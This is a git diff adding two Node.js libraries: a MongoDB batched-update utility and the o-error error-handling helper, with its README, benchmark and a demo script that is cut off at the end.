+ * @property {string} [BATCH_DESCENDING]
+ * @property {string} [BATCH_LAST_ID]
+ * @property {string} [BATCH_MAX_TIME_SPAN_IN_MS]
+ * @property {string} [BATCH_RANGE_END]
+ * @property {string} [BATCH_RANGE_START]
+ * @property {string} [BATCH_SIZE]
+ * @property {string} [VERBOSE_LOGGING]
+ */
+
+/**
+ * @param {BatchedUpdateOptions} options
+ */
+function refreshGlobalOptionsForBatchedUpdate(options = {}) {
+  options = Object.assign({}, options, process.env)
+
+  BATCH_DESCENDING = options.BATCH_DESCENDING === 'true'
+  BATCH_SIZE = parseInt(options.BATCH_SIZE || '1000', 10) || 1000
+  VERBOSE_LOGGING = options.VERBOSE_LOGGING === 'true'
+  if (options.BATCH_LAST_ID) {
+    BATCH_RANGE_START = objectIdFromInput(options.BATCH_LAST_ID)
+  } else if (options.BATCH_RANGE_START) {
+    BATCH_RANGE_START = objectIdFromInput(options.BATCH_RANGE_START)
+  } else {
+    if (BATCH_DESCENDING) {
+      BATCH_RANGE_START = ID_EDGE_FUTURE
+    } else {
+      BATCH_RANGE_START = ID_EDGE_PAST
+    }
+  }
+  BATCH_MAX_TIME_SPAN_IN_MS = parseInt(
+    options.BATCH_MAX_TIME_SPAN_IN_MS || ONE_MONTH_IN_MS.toString(),
+    10
+  )
+  if (options.BATCH_RANGE_END) {
+    BATCH_RANGE_END = objectIdFromInput(options.BATCH_RANGE_END)
+  } else {
+    if (BATCH_DESCENDING) {
+      BATCH_RANGE_END = ID_EDGE_PAST
+    } else {
+      BATCH_RANGE_END = ID_EDGE_FUTURE
+    }
+  }
+}
+
+/**
+ * @param {Collection | LegacyCollection} collection
+ * @param {Document} query
+ * @param {ObjectId} start
+ * @param {ObjectId} end
+ * @param {Document} projection
+ * @param {FindOptions} findOptions
+ * @return {Promise<Array<Document>>}
+ */
+async function getNextBatch(
+  collection,
+  query,
+  start,
+  end,
+  projection,
+  findOptions
+) {
+  if (BATCH_DESCENDING) {
+    query._id = {
+      $gt: end,
+      $lte: start,
+    }
+  } else {
+    query._id = {
+      $gt: start,
+      $lte: end,
+    }
+  }
+  return await collection
+    .find(query, findOptions)
+    .project(projection)
+    .sort({ _id: BATCH_DESCENDING ?
-1 : 1 }) + .limit(BATCH_SIZE) + .toArray() +} + +/** + * @param {Collection | LegacyCollection} collection + * @param {Array} nextBatch + * @param {UpdateDocument} update + * @return {Promise} + */ +async function performUpdate(collection, nextBatch, update) { + await collection.updateMany( + { _id: { $in: nextBatch.map(entry => entry._id) } }, + update + ) +} + +/** + * @param {string} input + * @return {ObjectId} + */ +function objectIdFromInput(input) { + if (input.includes('T')) { + const t = new Date(input).getTime() + if (Number.isNaN(t)) throw new Error(`${input} is not a valid date`) + return objectIdFromMs(t) + } else { + return new ObjectId(input) + } +} + +/** + * @param {ObjectId} objectId + * @return {string} + */ +function renderObjectId(objectId) { + return `${objectId} (${objectId.getTimestamp().toISOString()})` +} + +/** + * @param {number} ms + * @return {ObjectId} + */ +function objectIdFromMs(ms) { + return ObjectId.createFromTime(ms / 1000) +} + +/** + * @param {ObjectId} id + * @return {number} + */ +function getMsFromObjectId(id) { + return id.getTimestamp().getTime() +} + +/** + * @param {ObjectId} start + * @return {ObjectId} + */ +function getNextEnd(start) { + let end + if (BATCH_DESCENDING) { + end = objectIdFromMs(getMsFromObjectId(start) - BATCH_MAX_TIME_SPAN_IN_MS) + if (getMsFromObjectId(end) <= getMsFromObjectId(BATCH_RANGE_END)) { + end = BATCH_RANGE_END + } + } else { + end = objectIdFromMs(getMsFromObjectId(start) + BATCH_MAX_TIME_SPAN_IN_MS) + if (getMsFromObjectId(end) >= getMsFromObjectId(BATCH_RANGE_END)) { + end = BATCH_RANGE_END + } + } + return end +} + +/** + * @param {Collection | LegacyCollection} collection + * @return {Promise} + */ +async function getIdEdgePast(collection) { + const [first] = await collection + .find({}) + .project({ _id: 1 }) + .sort({ _id: 1 }) + .limit(1) + .toArray() + if (!first) return null + // Go one second further into the past in order to include the first entry via + // first._id > ID_EDGE_PAST + return objectIdFromMs(Math.max(0, getMsFromObjectId(first._id) - 1000)) +} + +/** + * @param {Collection | LegacyCollection} collection + * @param {Document} query + * @param {UpdateDocument | ((batch: Array) => Promise)} update + * @param {Document} [projection] + * @param {FindOptions} [findOptions] + * @param {BatchedUpdateOptions} [batchedUpdateOptions] + */ +async function batchedUpdate( + collection, + query, + update, + projection, + findOptions, + batchedUpdateOptions +) { + // only a single batchedUpdate can run at a time due to global variables + if (BATCHED_UPDATE_RUNNING) { + throw new Error('batchedUpdate is already running') + } + try { + BATCHED_UPDATE_RUNNING = true + ID_EDGE_PAST = await getIdEdgePast(collection) + if (!ID_EDGE_PAST) { + console.warn( + `The collection ${collection.collectionName} appears to be empty.` + ) + return 0 + } + refreshGlobalOptionsForBatchedUpdate(batchedUpdateOptions) + + findOptions = findOptions || {} + findOptions.readPreference = READ_PREFERENCE_SECONDARY + + projection = projection || { _id: 1 } + let nextBatch + let updated = 0 + let start = BATCH_RANGE_START + + while (start !== BATCH_RANGE_END) { + let end = getNextEnd(start) + nextBatch = await getNextBatch( + collection, + query, + start, + end, + projection, + findOptions + ) + if (nextBatch.length > 0) { + end = nextBatch[nextBatch.length - 1]._id + updated += nextBatch.length + + if (VERBOSE_LOGGING) { + console.log( + `Running update on batch with ids ${JSON.stringify( + nextBatch.map(entry => entry._id) + )}` 
+ ) + } else { + console.error(`Running update on batch ending ${renderObjectId(end)}`) + } + + if (typeof update === 'function') { + await update(nextBatch) + } else { + await performUpdate(collection, nextBatch, update) + } + } + console.error(`Completed batch ending ${renderObjectId(end)}`) + start = end + } + return updated + } finally { + BATCHED_UPDATE_RUNNING = false + } +} + +/** + * @param {Collection | LegacyCollection} collection + * @param {Document} query + * @param {UpdateDocument | ((batch: Array) => Promise)} update + * @param {Document} [projection] + * @param {FindOptions} [findOptions] + * @param {BatchedUpdateOptions} [batchedUpdateOptions] + */ +function batchedUpdateWithResultHandling( + collection, + query, + update, + projection, + findOptions, + batchedUpdateOptions +) { + batchedUpdate( + collection, + query, + update, + projection, + findOptions, + batchedUpdateOptions + ) + .then(processed => { + console.error({ processed }) + process.exit(0) + }) + .catch(error => { + console.error({ error }) + process.exit(1) + }) +} + +module.exports = { + READ_PREFERENCE_SECONDARY, + objectIdFromInput, + renderObjectId, + batchedUpdate, + batchedUpdateWithResultHandling, +} diff --git a/libraries/mongo-utils/buildscript.txt b/libraries/mongo-utils/buildscript.txt new file mode 100644 index 0000000..a4e4fe7 --- /dev/null +++ b/libraries/mongo-utils/buildscript.txt @@ -0,0 +1,10 @@ +mongo-utils +--dependencies=None +--docker-repos=gcr.io/overleaf-ops +--env-add= +--env-pass-through= +--esmock-loader=False +--is-library=True +--node-version=20.18.2 +--public-repo=False +--script-version=4.7.0 diff --git a/libraries/mongo-utils/index.js b/libraries/mongo-utils/index.js new file mode 100644 index 0000000..e69de29 diff --git a/libraries/mongo-utils/package.json b/libraries/mongo-utils/package.json new file mode 100644 index 0000000..51e2148 --- /dev/null +++ b/libraries/mongo-utils/package.json @@ -0,0 +1,30 @@ +{ + "name": "@overleaf/mongo-utils", + "version": "0.0.1", + "description": "utilities to help working with mongo", + "main": "index.js", + "scripts": { + "test": "npm run lint && npm run format && npm run types:check && npm run test:unit", + "test:unit": "mocha --exit test/**/*.{js,cjs}", + "lint": "eslint --ext .js --ext .cjs --ext .ts --max-warnings 0 --format unix .", + "lint:fix": "eslint --fix --ext .js --ext .cjs --ext .ts .", + "format": "prettier --list-different $PWD/'**/*.{js,cjs,ts}'", + "format:fix": "prettier --write $PWD/'**/*.{js,cjs,ts}'", + "test:ci": "npm run test:unit", + "types:check": "tsc --noEmit" + }, + "author": "Overleaf (https://www.overleaf.com)", + "license": "AGPL-3.0-only", + "dependencies": { + "mongodb": "6.12.0", + "mongodb-legacy": "6.1.3" + }, + "devDependencies": { + "chai": "^4.3.6", + "mocha": "^11.1.0", + "sandboxed-module": "^2.0.4", + "sinon": "^9.2.4", + "sinon-chai": "^3.7.0", + "typescript": "^5.0.4" + } +} diff --git a/libraries/mongo-utils/test/setup.js b/libraries/mongo-utils/test/setup.js new file mode 100644 index 0000000..78e563f --- /dev/null +++ b/libraries/mongo-utils/test/setup.js @@ -0,0 +1,11 @@ +const chai = require('chai') +const sinonChai = require('sinon-chai') +const SandboxedModule = require('sandboxed-module') + +// Chai configuration +chai.should() +chai.use(sinonChai) + +SandboxedModule.configure({ + globals: { Buffer, JSON, console, process }, +}) diff --git a/libraries/mongo-utils/tsconfig.json b/libraries/mongo-utils/tsconfig.json new file mode 100644 index 0000000..d43bb24 --- /dev/null +++ 
b/libraries/mongo-utils/tsconfig.json @@ -0,0 +1,7 @@ +{ + "extends": "../../tsconfig.backend.json", + "include": [ + "**/*.js", + "**/*.cjs" + ] +} diff --git a/libraries/o-error/.editorconfig b/libraries/o-error/.editorconfig new file mode 100644 index 0000000..9d08a1a --- /dev/null +++ b/libraries/o-error/.editorconfig @@ -0,0 +1,9 @@ +root = true + +[*] +charset = utf-8 +indent_style = space +indent_size = 2 +end_of_line = lf +insert_final_newline = true +trim_trailing_whitespace = true diff --git a/libraries/o-error/.gitignore b/libraries/o-error/.gitignore new file mode 100644 index 0000000..cf2f0ad --- /dev/null +++ b/libraries/o-error/.gitignore @@ -0,0 +1,5 @@ +.nyc_output +coverage +node_modules/ + +.npmrc diff --git a/libraries/o-error/.nvmrc b/libraries/o-error/.nvmrc new file mode 100644 index 0000000..0254b1e --- /dev/null +++ b/libraries/o-error/.nvmrc @@ -0,0 +1 @@ +20.18.2 diff --git a/libraries/o-error/CHANGELOG.md b/libraries/o-error/CHANGELOG.md new file mode 100644 index 0000000..6d1a61f --- /dev/null +++ b/libraries/o-error/CHANGELOG.md @@ -0,0 +1,3 @@ +# @overleaf/o-error History + +Please see the [Releases on GitHub](https://github.com/overleaf/o-error/releases) for history. diff --git a/libraries/o-error/LICENSE b/libraries/o-error/LICENSE new file mode 100644 index 0000000..b301625 --- /dev/null +++ b/libraries/o-error/LICENSE @@ -0,0 +1,21 @@ +The MIT License + +Copyright (c) 2016-2018 Overleaf https://www.overleaf.com + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in +all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN +THE SOFTWARE. diff --git a/libraries/o-error/README.md b/libraries/o-error/README.md new file mode 100644 index 0000000..cf6582b --- /dev/null +++ b/libraries/o-error/README.md @@ -0,0 +1,475 @@ +# @overleaf/o-error + +[![npm version](https://badge.fury.io/js/%40overleaf%2Fo-error.svg)](https://badge.fury.io/js/%40overleaf%2Fo-error) +[![CircleCI](https://circleci.com/gh/overleaf/o-error.svg?style=svg)](https://circleci.com/gh/overleaf/o-error) +[![Coverage Status](https://coveralls.io/repos/github/overleaf/o-error/badge.svg?branch=master)](https://coveralls.io/github/overleaf/o-error?branch=master) + +Light-weight helpers for handling JavaScript Errors in node.js and the browser. + +- Get long stack traces across async functions and callbacks with `OError.tag`. +- Easily make custom `Error` subclasses. +- Wrap internal errors, preserving the original errors for logging as `causes`. +- Play nice with error logging services by keeping data in attached `info` objects instead of the error message. 
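+
+A minimal sketch of how these pieces fit together (each API used here is
+covered in detail below):
+
+```js
+const OError = require('@overleaf/o-error')
+
+class UserNotFoundError extends OError {
+  constructor(userId) {
+    super('user not found', { userId }) // subclass with attached info
+  }
+}
+
+try {
+  try {
+    throw new Error('socket hang up') // some internal failure
+  } catch (err) {
+    // wrap the internal error, preserving it as the cause
+    throw new UserNotFoundError(123).withCause(err)
+  }
+} catch (err) {
+  OError.tag(err, 'failed to say hi', { request: 'GET /hi' }) // call-site context
+  console.error(OError.getFullStack(err)) // stacks for the error, tags and cause
+  console.error(OError.getFullInfo(err)) // { userId: 123, request: 'GET /hi' }
+}
+```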
+ +## Table of Contents + + + +- [Long Stack Traces with `OError.tag`](#long-stack-traces-with-oerrortag) + * [The Problem](#the-problem) + * [The Solution](#the-solution) + * [Adding More Info](#adding-more-info) + * [`async`/`await`](#asyncawait) + * [Better Async Stack Traces in Node 12+](#better-async-stack-traces-in-node-12) + * [Caveat: Shared Error Instances](#caveat-shared-error-instances) +- [Create Custom Error Classes](#create-custom-error-classes) + * [Attaching Extra Info](#attaching-extra-info) + * [Wrapping an Internal Error](#wrapping-an-internal-error) +- [OError API Reference](#oerror-api-reference) + * [new OError(message, [info], [cause])](#new-oerrormessage-info-cause) + * [oError.withInfo(info) ⇒ this](#oerrorwithinfoinfo--this) + * [oError.withCause(cause) ⇒ this](#oerrorwithcausecause--this) + * [OError.maxTags : Number](#oerrormaxtags--number) + * [OError.tag(error, [message], [info]) ⇒ Error](#oerrortagerror-message-info--error) + * [OError.getFullInfo(error) ⇒ Object](#oerrorgetfullinfoerror--object) + * [OError.getFullStack(error) ⇒ string](#oerrorgetfullstackerror--string) +- [References](#references) + + + +## Long Stack Traces with `OError.tag` + +### The Problem + +While JavaScript errors have stack traces, they only go back to the start of the latest tick, so they are often not very useful. For example: + +```js +const demoDatabase = { + findUser(id, callback) { + process.nextTick(() => { + // return result asynchronously + if (id === 42) { + callback(null, { name: 'Bob' }) + } else { + callback(new Error('not found')) + } + }) + }, +} + +function sayHi1(userId, callback) { + demoDatabase.findUser(userId, (err, user) => { + if (err) return callback(err) + callback(null, 'Hi ' + user.name) + }) +} + +sayHi1(43, (err, result) => { + if (err) { + console.error(err) + } else { + console.log(result) + } +}) +``` + +The resulting error's stack trace doesn't make any mention of our `sayHi1` function; it starts at the `nextTick` built-in: + +``` +Error: not found + at process.nextTick (repl:8:18) + at process._tickCallback (internal/process/next_tick.js:61:11) +``` + +In practice, it's often even worse, like + +``` +DBError: socket connection refused + at someObscureLibraryFunction (...) + at ... +``` + +### The Solution + +Before passing the error to a callback, call the `OError.tag` function to capture a stack trace at the call site: + +```js +const OError = require('.') + +function sayHi2(userId, callback) { + demoDatabase.findUser(userId, (err, user) => { + if (err) return callback(OError.tag(err)) + callback(null, 'Hi ' + user.name) + }) +} + +sayHi2(43, (err, result) => { + if (err) { + console.error(OError.getFullStack(OError.tag(err))) + } else { + console.log(result) + } +}) +``` + +And use `OError.getFullStack` to reconstruct the full stack, including the tagged errors: + +``` +Error: not found + at process.nextTick (repl:8:18) + at process._tickCallback (internal/process/next_tick.js:61:11) +TaggedError + at demoDatabase.findUser (repl:3:37) + at process.nextTick (repl:8:9) + at process._tickCallback (internal/process/next_tick.js:61:11) +TaggedError + at sayHi2 (repl:3:46) + at demoDatabase.findUser (repl:3:21) + at process.nextTick (repl:8:9) + at process._tickCallback (internal/process/next_tick.js:61:11) +``` + +The full stack contains the original error's stack and also the `TaggedError` stacks. There's some redundancy, but it's better to have too much information than too little. 
+
+### Adding More Info
+
+You can add more information at each `tag` call site: a message and an `info` object with custom properties.
+
+```js
+function sayHi3(userId, callback) {
+  demoDatabase.findUser(userId, (err, user) => {
+    if (err) return callback(OError.tag(err, 'failed to find user', { userId }))
+    callback(null, 'Hi ' + user.name)
+  })
+}
+
+sayHi3(43, (err, result) => {
+  if (err) {
+    OError.tag(err, 'failed to say hi')
+    console.error(OError.getFullStack(err))
+    console.error(OError.getFullInfo(err))
+  } else {
+    console.log(result)
+  }
+})
+```
+
+The `OError.getFullInfo` helper merges all of the `info`s from the tags together into one object. This logs a full stack trace with `failed to ...` annotations and an `info` object that contains the `userId` that it failed to find:
+
+```
+Error: not found
+    at process.nextTick (repl:8:18)
+    at process._tickCallback (internal/process/next_tick.js:61:11)
+TaggedError: failed to find user
+    at demoDatabase.findUser (repl:3:37)
+    at process.nextTick (repl:8:9)
+    at process._tickCallback (internal/process/next_tick.js:61:11)
+TaggedError: failed to say hi
+    at sayHi3 (repl:3:12)
+    at demoDatabase.findUser (repl:3:21)
+    at process.nextTick (repl:8:9)
+    at process._tickCallback (internal/process/next_tick.js:61:11)
+
+{ userId: 43 }
+```
+
+Logging this information (or reporting it to an error monitoring service) hopefully gives you a good start to figuring out what went wrong.
+
+### `async`/`await`
+
+The `OError.tag` approach works with both async/await and callback-oriented code. When using async/await, the pattern is to catch an error, tag it and rethrow:
+
+```js
+const promisify = require('util').promisify
+demoDatabase.findUserAsync = promisify(demoDatabase.findUser)
+
+async function sayHi4(userId) {
+  try {
+    const user = await demoDatabase.findUserAsync(userId)
+    return `Hi ${user.name}`
+  } catch (error) {
+    throw OError.tag(error, 'failed to find user', { userId })
+  }
+}
+
+async function main() {
+  try {
+    await sayHi4(43)
+  } catch (error) {
+    OError.tag(error, 'failed to say hi')
+    console.error(OError.getFullStack(error))
+    console.error(OError.getFullInfo(error))
+  }
+}
+main()
+```
+
+The resulting full stack trace points to `sayHi4` in `main`, as expected:
+
+```
+Error: not found
+    at process.nextTick (repl:8:18)
+    at process._tickCallback (internal/process/next_tick.js:61:11)
+TaggedError: failed to find user
+    at sayHi4 (repl:6:18)
+    at process._tickCallback (internal/process/next_tick.js:68:7)
+TaggedError: failed to say hi
+    at main (repl:5:12)
+    at process._tickCallback (internal/process/next_tick.js:68:7)
+
+{ userId: 43 }
+```
+
+### Better Async Stack Traces in Node 12+
+
+The above output is from node 10. Node 12 has improved stack traces for async code that uses native promises. However, until your whole stack, including all libraries, is using async/await and native promises, you're still likely to get unhelpful stack traces. So, the tagging approach still adds value, even in node 12. (And the `info` from tagging can add value even to a good stack trace, because it can contain clues about the input that caused the error.)
+
+### Caveat: Shared Error Instances
+
+Some libraries, such as `ioredis`, may return the same `Error` instance to multiple callbacks. In this case, the tags may be misleading, because they will be a mixture of the different 'stacks' that lead to the error.
You can either accept this or choose to instead wrap the errors from these libraries with new `OError` instances using `withCause`. + +In the worst case, a library that always returns a single instance of an error could cause a resource leak. To prevent this, `OError` will only add up to `OError.maxTags` (default 100) tags to a single Error instance. + +## Create Custom Error Classes + +Broadly speaking, there are two kinds of errors: those we try to recover from, and those for which we give up (i.e. a 5xx response in a web application). For the latter kind, we usually just want to log a message and stack trace useful for debugging, which `OError.tag` helps with. + +To recover from an error, we usually need to know what kind of error it was and perhaps to check some of its properties. Defining a custom Error subclass is a good way to do this. Callers can check the type of the error either with `instanceof` or using a custom property, such as `code`. + +With ES6 classes, creating a custom error subclass is mostly as simple as `extends Error`. One extra line is required to set the error's `name` appropriately, and inheriting from `OError` handles this implementation detail. Here's an example: + +```js +class UserNotFoundError extends OError { + constructor() { + super('user not found') + } +} + +try { + throw new UserNotFoundError() +} catch (error) { + console.error(`instanceof Error: ${error instanceof Error}`) + console.error( + `instanceof UserNotFoundError: ${error instanceof UserNotFoundError}` + ) + console.error(error.stack) +} +``` + +``` +instanceof Error: true +instanceof UserNotFoundError: true +UserNotFoundError: user not found + at repl:2:9 + ... +``` + +### Attaching Extra Info + +Whether for helping with error recovery or just for debugging, it is often helpful to include some of the state that caused the error in the error. One way to do this is to put it in the message, but this has a few problems: + +- Even if the error is later handled and recovered from, we spend time stringifying the state to add it to the error message. +- Error monitoring systems often look at the message when trying to group similar errors together, and they can get confused by the ever-changing messages. +- When using structured logging, you lose the ability to easily query or filter the logs based on the state; instead clever regexes may be required to get it out of the messages. + +Instead, `OError`s (and subclasses) support an `info` object that can contain arbitrary data. Using `info`, we might write the above example as: + +```js +class UserNotFoundError extends OError { + constructor(userId) { + super('user not found', { userId }) + } +} + +try { + throw new UserNotFoundError(123) +} catch (error) { + console.error(OError.getFullStack(error)) + console.error(OError.getFullInfo(error)) +} +``` + +``` +UserNotFoundError: user not found + at repl:2:9 + ... +{ userId: 123 } +``` + +The `OError.getFullInfo` helper merges the `info` on custom errors and any info added with `OError.tag` on its way up the stack. It is intended for use when logging errors. If trying to recover from an error that is known to be a `UserNotFoundError`, it is usually better to interrogate `error.info.userId` directly. + +### Wrapping an Internal Error + +Detecting a condition like 'user not found' in the example above often starts with an internal database error. 
It is possible to just let the internal database error propagate all the way up through the stack, but this makes the code more coupled to the internals of the database (or database driver). It is often cleaner to handle and wrap the internal error in one that is under your control. Tying up the examples above: + +```js +async function sayHi5(userId) { + try { + const user = await demoDatabase.findUserAsync(userId) + return `Hi ${user.name}` + } catch (error) { + if (error.message === 'not found') { + throw new UserNotFoundError(userId).withCause(error) + } + } +} + +async function main() { + try { + await sayHi5(43) + } catch (error) { + OError.tag(error, 'failed to say hi') + console.error(OError.getFullStack(error)) + console.error(OError.getFullInfo(error)) + } +} +main() +``` + +The output includes the wrapping error, the tag and the cause, together with the info: + +``` +UserNotFoundError: user not found + at sayHi5 (repl:7:13) + at process._tickCallback (internal/process/next_tick.js:68:7) +TaggedError: failed to say hi + at main (repl:5:12) + at process._tickCallback (internal/process/next_tick.js:68:7) +caused by: + Error: not found + at process.nextTick (repl:8:18) + at process._tickCallback (internal/process/next_tick.js:61:11) +{ userId: 43 } +``` + +## OError API Reference + + +* [OError](#OError) + * [new OError(message, [info], [cause])](#new_OError_new) + * _instance_ + * [.withInfo(info)](#OError+withInfo) ⇒ this + * [.withCause(cause)](#OError+withCause) ⇒ this + * _static_ + * [.maxTags](#OError.maxTags) : Number + * [.tag(error, [message], [info])](#OError.tag) ⇒ Error + * [.getFullInfo(error)](#OError.getFullInfo) ⇒ Object + * [.getFullStack(error)](#OError.getFullStack) ⇒ string + + + +### new OError(message, [info], [cause]) + +| Param | Type | Description | +| --- | --- | --- | +| message | string | as for built-in Error | +| [info] | Object | extra data to attach to the error | +| [cause] | Error | the internal error that caused this error | + + + +### oError.withInfo(info) ⇒ this +Set the extra info object for this error. + +**Kind**: instance method of [OError](#OError) + +| Param | Type | Description | +| --- | --- | --- | +| info | Object | extra data to attach to the error | + + + +### oError.withCause(cause) ⇒ this +Wrap the given error, which caused this error. + +**Kind**: instance method of [OError](#OError) + +| Param | Type | Description | +| --- | --- | --- | +| cause | Error | the internal error that caused this error | + + + +### OError.maxTags : Number +Maximum number of tags to apply to any one error instance. This is to avoid +a resource leak in the (hopefully unlikely) case that a singleton error +instance is returned to many callbacks. If tags have been dropped, the full +stack trace will include a placeholder tag `... dropped tags`. + +Defaults to 100. Must be at least 1. + +**Kind**: static property of [OError](#OError) + + +### OError.tag(error, [message], [info]) ⇒ Error +Tag debugging information onto any error (whether an OError or not) and +return it. 
+
+### oError.withInfo(info) ⇒ this
+Set the extra info object for this error.
+
+**Kind**: instance method of [OError](#OError)
+
+| Param | Type | Description |
+| --- | --- | --- |
+| info | Object | extra data to attach to the error |
+
+### oError.withCause(cause) ⇒ this
+Wrap the given error, which caused this error.
+
+**Kind**: instance method of [OError](#OError)
+
+| Param | Type | Description |
+| --- | --- | --- |
+| cause | Error | the internal error that caused this error |
+
+### OError.maxTags : Number
+Maximum number of tags to apply to any one error instance. This is to avoid
+a resource leak in the (hopefully unlikely) case that a singleton error
+instance is returned to many callbacks. If tags have been dropped, the full
+stack trace will include a placeholder tag `... dropped tags`.
+
+Defaults to 100. Must be at least 1.
+
+**Kind**: static property of [OError](#OError)
+
+### OError.tag(error, [message], [info]) ⇒ Error
+Tag debugging information onto any error (whether an OError or not) and
+return it.
+
+**Kind**: static method of [OError](#OError)
+**Returns**: Error - the modified `error` argument
+
+| Param | Type | Description |
+| --- | --- | --- |
+| error | Error | the error to tag |
+| [message] | string | message with which to tag `error` |
+| [info] | Object | extra data with which to tag `error` |
+
+**Example** *(An error in a callback)*
+```js
+function findUser(name, callback) {
+  fs.readFile('/etc/passwd', (err, data) => {
+    if (err) return callback(OError.tag(err, 'failed to read passwd'))
+    // ...
+  })
+}
+```
+**Example** *(A possible error in a callback)*
+```js
+function cleanup(callback) {
+  fs.unlink('/tmp/scratch', (err) => callback(err && OError.tag(err)))
+}
+```
+**Example** *(An error with async/await)*
+```js
+async function cleanup() {
+  try {
+    await fs.promises.unlink('/tmp/scratch')
+  } catch (err) {
+    throw OError.tag(err, 'failed to remove scratch file')
+  }
+}
+```
+
+### OError.getFullInfo(error) ⇒ Object
+The merged info from any `tag`s and causes on the given error.
+
+If an info property is repeated, the last one wins.
+
+**Kind**: static method of [OError](#OError)
+
+| Param | Type | Description |
+| --- | --- | --- |
+| error | Error \| null \| undefined | any error (may or may not be an `OError`) |
+
+### OError.getFullStack(error) ⇒ string
+Return the `stack` property from `error`, including the `stack`s for any
+tagged errors added with `OError.tag` and for any `cause`s.
+
+**Kind**: static method of [OError](#OError)
+
+| Param | Type | Description |
+| --- | --- | --- |
+| error | Error \| null \| undefined | any error (may or may not be an `OError`) |
+
+## References
+
+- [MDN: Error](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Error)
+- [Error Handling in Node.js](https://www.joyent.com/node-js/production/design/errors)
+- [verror](https://github.com/joyent/node-verror)
+- [Custom JavaScript Errors in ES6](https://medium.com/@xjamundx/custom-javascript-errors-in-es6-aa891b173f87)
+- [Custom errors, extending Error](https://javascript.info/custom-errors)
+- https://gist.github.com/justmoon/15511f92e5216fa2624b (some tests are based largely on this gist)
diff --git a/libraries/o-error/buildscript.txt b/libraries/o-error/buildscript.txt
new file mode 100644
index 0000000..81d3eb3
--- /dev/null
+++ b/libraries/o-error/buildscript.txt
@@ -0,0 +1,10 @@
+o-error
+--dependencies=None
+--docker-repos=gcr.io/overleaf-ops
+--env-add=
+--env-pass-through=
+--esmock-loader=False
+--is-library=True
+--node-version=20.18.2
+--public-repo=False
+--script-version=4.7.0
diff --git a/libraries/o-error/doc/benchmark.js b/libraries/o-error/doc/benchmark.js
new file mode 100644
index 0000000..4e1bf26
--- /dev/null
+++ b/libraries/o-error/doc/benchmark.js
@@ -0,0 +1,44 @@
+//
+// A quick microbenchmark for OError.tag.
+//
+const OError = require('..')
+
+function benchmark(fn, repeats = 100000) {
+  const startTime = process.hrtime()
+  for (let i = 0; i < repeats; ++i) {
+    fn()
+  }
+  const elapsed = process.hrtime(startTime)
+  return elapsed[0] * 1e3 + elapsed[1] * 1e-6
+}
+
+function throwError() {
+  throw new Error('here is a test error')
+}
+
+console.log(
+  'no tagging: ',
+  benchmark(() => {
+    try {
+      throwError()
+      return 1
+    } catch (error) {
+      return 0
+    }
+  }),
+  'ms'
+)
+
+console.log(
+  'tagging: ',
+  benchmark(() => {
+    try {
+      throwError()
+      return 1
+    } catch (error) {
+      OError.tag(error, 'here is a test tag')
+      return 0
+    }
+  }),
+  'ms'
+)
diff --git a/libraries/o-error/doc/demo.js b/libraries/o-error/doc/demo.js
new file mode 100644
index 0000000..9ebef2d
--- /dev/null
+++ b/libraries/o-error/doc/demo.js
@@ -0,0 +1,141 @@
+// This is the code from the README.
+
+const OError = require('..')
+
+const demoDatabase = {
+  findUser(id, callback) {
+    process.nextTick(() => {
+      // return result asynchronously
+      if (id === 42) {
+        callback(null, { name: 'Bob' })
+      } else {
+        callback(new Error('not found'))
+      }
+    })
+  },
+}
+
+function sayHi1(userId, callback) {
+  demoDatabase.findUser(userId, (err, user) => {
+    if (err) return callback(err)
+    callback(null, 'Hi ' + user.name)
+  })
+}
+
+sayHi1(42, (err, result) => {
+  if (err) {
+    console.error(err)
+  } else {
+    console.log(result)
+  }
+})
+
+sayHi1(43, (err, result) => {
+  if (err) {
+    console.error(err)
+  } else {
+    console.log(result)
+  }
+})
+
+function sayHi2(userId, callback) {
+  demoDatabase.findUser(userId, (err, user) => {
+    if (err) return callback(OError.tag(err))
+    callback(null, 'Hi ' + user.name)
+  })
+}
+
+sayHi2(43, (err, result) => {
+  if (err) {
+    console.error(OError.getFullStack(OError.tag(err)))
+  } else {
+    console.log(result)
+  }
+})
+
+function sayHi3(userId, callback) {
+  demoDatabase.findUser(userId, (err, user) => {
+    if (err) return callback(OError.tag(err, 'failed to find user', { userId }))
+    callback(null, 'Hi ' + user.name)
+  })
+}
+
+sayHi3(43, (err, result) => {
+  if (err) {
+    OError.tag(err, 'failed to say hi')
+    console.error(OError.getFullStack(err))
+    console.error(OError.getFullInfo(err))
+  } else {
+    console.log(result)
+  }
+})
+
+const promisify = require('node:util').promisify
+demoDatabase.findUserAsync = promisify(demoDatabase.findUser)
+
+async function sayHi4NoHandling(userId) {
+  const user = await demoDatabase.findUserAsync(userId)
+  return `Hi ${user.name}`
+}
+
+async function sayHi4(userId) {
+  try {
+    const user = await demoDatabase.findUserAsync(userId)
+    return `Hi ${user.name}`
+  } catch (error) {
+    throw OError.tag(error, 'failed to find user', { userId })
+  }
+}
+
+async function main() {
+  try {
+    await sayHi4NoHandling(43)
+  } catch (error) {
+    console.error(OError.getFullStack(error))
+    console.error(OError.getFullInfo(error))
+  }
+
+  try {
+    await sayHi4(43)
+  } catch (error) {
+    OError.tag(error, 'failed to say hi')
+    console.error(OError.getFullStack(error))
+    console.error(OError.getFullInfo(error))
+  }
+}
+main()
+
+class UserNotFoundError extends OError {
+  constructor(userId) {
+    super('user not found', { userId })
+  }
+}
+
+try {
+  throw new UserNotFoundError(123)
+} catch (error) {
+  console.error(OError.getFullStack(error))
+  console.error(OError.getFullInfo(error))
+}
+async function sayHi5(userId) {
+  try {
+    const user = await demoDatabase.findUserAsync(userId)
